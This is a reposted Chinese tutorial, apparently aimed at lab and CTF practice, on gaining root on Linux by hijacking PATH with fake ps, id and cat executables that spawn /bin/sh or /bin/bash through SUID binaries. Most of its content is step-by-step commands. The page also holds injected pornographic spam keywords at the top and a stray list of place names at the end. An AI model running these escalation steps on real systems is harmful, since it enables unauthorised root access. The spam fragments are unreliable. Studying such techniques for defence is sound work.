日B视频 亚洲,啪啪啪网站一区二区,91色情精品久久,日日噜狠狠色综合久,超碰人妻少妇97在线,999青青视频,亚洲一区二卡,让本一区二区视频,日韩网站推荐

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

如何使用環(huán)境變量進行Linux提權的方法詳細資料概述

馬哥Linux運維 ? 來源:未知 ? 作者:易水寒 ? 2018-07-05 09:50 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

在這篇文章中,我將會為大家介紹一些使用環(huán)境變量進行Linux提權的方法,包括在CTF challenges中使用到一些的技術。話不多說,讓我們進入正題!

介紹

PATH是Linux和類Unix操作系統(tǒng)中的環(huán)境變量,它指定存儲可執(zhí)行程序的所有bin和sbin目錄。當用戶在終端上執(zhí)行任何命令時,它會通過PATH變量來響應用戶執(zhí)行的命令,并向shell發(fā)送請求以搜索可執(zhí)行文件。超級用戶通常還具有/sbin和/usr/sbin條目,以便于系統(tǒng)管理命令的執(zhí)行。

使用echo命令顯示當前PATH環(huán)境變量:

echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

如果你在PATH變量中看到‘.’,則意味著登錄用戶可以從當前目錄執(zhí)行二進制文件/腳本,這對于攻擊者而言也是一個提權的絕好機會。這里之所以沒有指定程序的完整路徑,往往是因為編寫程序時的疏忽造成的。

方法1

Ubuntu LAB SET_UP

當前,我們位于/home/raj目錄,我們將在其中創(chuàng)建一個名為/script的新目錄。在script目錄下,我們將編寫一個小型的c程序來調用系統(tǒng)二進制文件的函數。

pwdmkdir scriptcd /scriptnano demo.c

如何使用環(huán)境變量進行Linux提權的方法詳細資料概述

正如你在demo.c文件中看到的,我們正在調用ps命令。

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。

lsgcc demo.c -o shellchmod u+s shellls -la shell

受害者VM機器

假設我們已經成功滲透目標,并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令,搜索具有SUID或4000權限的文件。

find / -perm -u=s -type f 2>/dev/null

通過上述命令,攻擊者可以枚舉出目標系統(tǒng)上所有的可執(zhí)行文件,這里可以看到/home/raj/script/shell具有SUID權限。

進入到/home/raj/script目錄,可以看到該目錄下有一個可執(zhí)行的“shell”文件,我們運行這個文件。

/home/raj/script

Echo命令

cd /tmpecho “/bin/sh” > pschmod 777 psecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shellwhoami

Copy命令

cd /home/raj/script/cp /bin/sh /tmp/psecho $PATHexport PATH=/tmp:$PATH./shellwhoami

Symlink命令

ln -s /bin/sh psexport PATH=.:$PATH./shellidwhoami

注意:符號鏈接也叫軟鏈接,如果目錄具有完全權限,則它將成功運行。在Ubuntu中symlink情況下,我們已經賦予了/script目錄777的權限。

因此,攻擊者可以操縱環(huán)境變量PATH來進行提權,并獲得root訪問權限。

方法2

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環(huán)境,現在在腳本目錄中,我們將編寫一個小型的c程序來調用系統(tǒng)二進制文件的函數。

pwdmkdir scriptcd /scriptnano demo.c

正如你在demo.c文件中看到的,我們正在調用id命令。

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。

lsgcc demo.c -o shell2chmod u+s shell2ls -la shell2

受害者VM機器

同樣,假設我們已經成功滲透目標,并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令,搜索具有SUID或4000權限的文件。在這里,我們可以看到/home/raj/script/shell2具有SUID權限。

find / -perm -u=s -type f 2>/dev/null

進入到/home/raj/script目錄,可以看到該目錄下有一個可執(zhí)行的“shell2”文件,我們運行這個文件。

cd /home/raj/scriptls./shell2

Echo命令

cd /tmpecho “/bin/sh” > idchmod 777 idecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shell2whoami

方法3

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環(huán)境。正如你在demo.c文件中看到的,我們正在調用cat命令從etc/passwd文件中讀取內容。

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。

lsgcc demo.c -o rajchmod u+s rajls -la raj

受害者VM機器

同樣,假設我們已經成功滲透目標,并進入提權階段,通過執(zhí)行以下命令查看sudo用戶列表。

find / -perm -u=s -type f 2>/dev/null

在這里,我們可以看到/home/raj/script/raj具有SUID權限,進入到home/raj/script/目錄,可以看到該目錄下有一個可執(zhí)行的“raj”文件。所以當我們運行這個文件時,它會把etc/passwd文件作為輸出結果。

cd /home/raj/script/ls./raj

Nano**編輯器**

cd /tmpnano cat

現在,當終端打開時輸入/bin/bash并保存。

chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./rajwhoami

方法4

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環(huán)境。正如你在demo.c文件中看到的,我們正在調用cat命令讀取/home/raj中的msg.txt中的內容,但/home/raj中并沒有這樣的文件。

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。

lsgcc demo.c -o ignitechmod u+s ignitels -la ignite

受害者VM機器

同樣,假設我們已經成功滲透目標,并進入提權階段,通過執(zhí)行以下命令查看sudo用戶列表

find / -perm -u=s -type f 2>/dev/null

在這里,我們可以看到/home/raj/script/ignite具有SUID權限,進入到/home/raj/script目錄,可以看到該目錄下有一個可執(zhí)行的“ignite”文件。所以當我們運行這個文件時,它會報錯“cat: /home/raj/msg.txt”文件或目錄不存在。

cd /home/raj/scriptls./ignite

Vi編輯器

cd /tmpvi cat

現在,當終端打開時輸入/bin/bash并保存。

chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./ignitewhoami

如何使用環(huán)境變量進行Linux提權的方法詳細資料概述

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • Linux
    +關注

    關注

    88

    文章

    11822

    瀏覽量

    219600
  • UNIX
    +關注

    關注

    0

    文章

    296

    瀏覽量

    43167
  • ECHO
    +關注

    關注

    1

    文章

    74

    瀏覽量

    28321

原文標題:黑客的Linux神技能:使用環(huán)境變量進行提權

文章出處:【微信號:magedu-Linux,微信公眾號:馬哥Linux運維】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    深度解析?RK?平臺?U-Boot?環(huán)境變量(env):原理、配置與實戰(zhàn)

    定制化設計。本文將從通用概念、RK?平臺特殊處理、工作流程、調試方法等維度,全面拆解?RK?平臺環(huán)境變量的底層邏輯與實操技巧。 一、環(huán)境變量的通用概念 1.1?什么是環(huán)境變量?
    的頭像 發(fā)表于 04-27 07:11 ?529次閱讀
    深度解析?RK?平臺?U-Boot?<b class='flag-5'>環(huán)境變量</b>(env):原理、配置與實戰(zhàn)

    Linux系統(tǒng)中常見的風險點總結

    Linux (Privilege Escalation)是指攻擊者或惡意用戶從低權限賬號獲取更高權限的過程。在實際的安全事件中,攻擊者很少能直接獲得 root 權限,更多的情況是首先通過某個漏洞或配置錯誤獲得普通用戶權限,然
    的頭像 發(fā)表于 04-22 10:34 ?322次閱讀

    飛凌嵌入式ElfBoard-環(huán)境變量之刪除清空環(huán)境變量environ

    使用這種方法,除非明確知道這么操作是為了做什么。因此,最好在需要清除某個特定環(huán)境變量時使用 unsetenv()函數顯式地刪除它,以釋放其占用的內存。
    發(fā)表于 03-26 10:23

    飛凌嵌入式ElfBoard-環(huán)境變量之刪除清空環(huán)境變量clearenv

    有的場景需要清空環(huán)境變量,然后再重新進行構建,如果是使用unsetent的話會比較繁瑣;clearenv() 將當前進程的環(huán)境變量列表清空,使得后續(xù)的環(huán)境變量訪問(如getenv())
    發(fā)表于 03-26 10:22

    飛凌嵌入式ElfBoard-環(huán)境變量之添加修改環(huán)境變量setenv

    setenv() 函數可以向進程的環(huán)境變量列表中添加新的環(huán)境變量,或者修改現有環(huán)境變量的值。相比 putenv(),setenv() 提供了更安全的方式來操作環(huán)境變量,因為它會復制傳入
    發(fā)表于 03-26 09:24

    飛凌嵌入式ElfBoard-環(huán)境變量之添加修改環(huán)境變量putenv

    在shell中有許多方法能夠修改環(huán)境變量,例如export,set等命令;要永久修改環(huán)境變量,也可以將 export 相關語句添加到用戶的 ~/.bashrc 或 ~/.bash_profile
    發(fā)表于 03-26 09:22

    【米爾全志T153開發(fā)板評測】串口網口登錄與C開發(fā)環(huán)境搭建

    arm-buildroot-linux-gnueabihf_sdk-buildroot.tar.gz 配置環(huán)境變量 cd arm-buildroot-linux-gnueabihf_sdk-buildroot/ ./rel
    發(fā)表于 03-16 22:08

    飛凌嵌入式ElfBoard-環(huán)境變量之獲取環(huán)境變量

    所有符合標準的C語言編譯器和平臺。原型 3 提供了參數用來獲取環(huán)境變量,這并不是標準C的main函數定義,不過有些系統(tǒng)可以使用它來接收環(huán)境變量(如Linux)。在類Unix操作系統(tǒng)(如Linu
    發(fā)表于 03-13 08:50

    Linux系統(tǒng)下各種工具鏈無法找到的解決方法

    工具鏈時,都要輸入一次source/etc/profile使環(huán)境變量重新添加。 除了gcc以外,openocd同樣需要按上述方法添加,否則可能在hello world示例最后一步遇到下述情況(同樣因為openocd工具未能調用而失?。? 添加路徑后所有關于工具鏈未找到的問
    發(fā)表于 10-27 07:49

    WIN10配置Hbird-SDK環(huán)境變量

    按照胡老師的《RISC-V CPU下工程與實踐》的7.4的151和152頁配置Hbird-SDK的環(huán)境變量,出現了問題。 問題如下: 首先創(chuàng)建setup_config.bat,之后CMD中運行
    發(fā)表于 10-27 06:38

    Window下AICube使用前如何配置dotnet環(huán)境

    使用AICube進行模型轉換的時候都會報錯“RuntimeError: Failed to initialize hostfxr”錯誤,這個錯誤就表明dotnet sdk沒有安裝好,或者環(huán)境變量添加
    發(fā)表于 08-04 06:19

    Linux基礎命令which詳解

    Linux系統(tǒng)中,which命令用于查找并顯示指定命令的可執(zhí)行文件路徑。這對于系統(tǒng)管理員和開發(fā)人員來說是一個非常有用的工具,可以幫助定位命令所在的位置,確認命令是否已正確安裝,并且能夠用于配置環(huán)境變量等任務。下面是華納云對which命令的
    的頭像 發(fā)表于 07-29 17:58 ?1076次閱讀

    迅為RK3588開發(fā)板RKLLM-Toolkit 環(huán)境搭建安裝 Miniconda

    Linux-aarch64 64-bit 兩個版本的安裝包進行下載,如下圖所示: 為了方便,已經將兩個安裝包存放到了“iTOP-3588 開發(fā)板\\\\02_【iTOP-RK3588 開發(fā)板】 開發(fā)資料
    發(fā)表于 06-03 17:06

    飛凌嵌入式ElfBoard ELF 1板卡-uboot常用命令之環(huán)境變量命令

    、bootargsbootargs是一個重要的環(huán)境變量,主要是給內核傳遞參數,整個環(huán)境變量都是圍繞著bootargs來設置的。bootargs非常的靈活,內核和文件系統(tǒng)的不同搭配就會有不同的設置方法。下面
    發(fā)表于 05-22 11:28

    飛凌嵌入式ElfBoard ELF 1板卡-Uboot常用命令之查看命令

    查看使用說明:=&gt;help setenv這里可以看到setenv命令有兩種用法,一種是設置環(huán)境變量值,一種是刪除環(huán)境變量,具體使用方法在下一節(jié)中詳細說明。
    發(fā)表于 05-22 11:26
    依安县| 乐平市| 平安县| 武汉市| 昌吉市| 清水县| 南开区| 滕州市| 昌乐县| 会泽县| 上高县| 夏河县| 乌兰察布市| 株洲市| 长兴县| 锡林浩特市| 玉田县| 阿克陶县| 政和县| 崇明县| 乌兰浩特市| 家居| 临夏市| 呼图壁县| 上饶市| 阿荣旗| 剑阁县| 乐昌市| 绥宁县| 房山区| 洛隆县| 安陆市| 盐山县| 华池县| 什邡市| 全椒县| 龙岩市| 舒兰市| 海城市| 尤溪县| 承德市|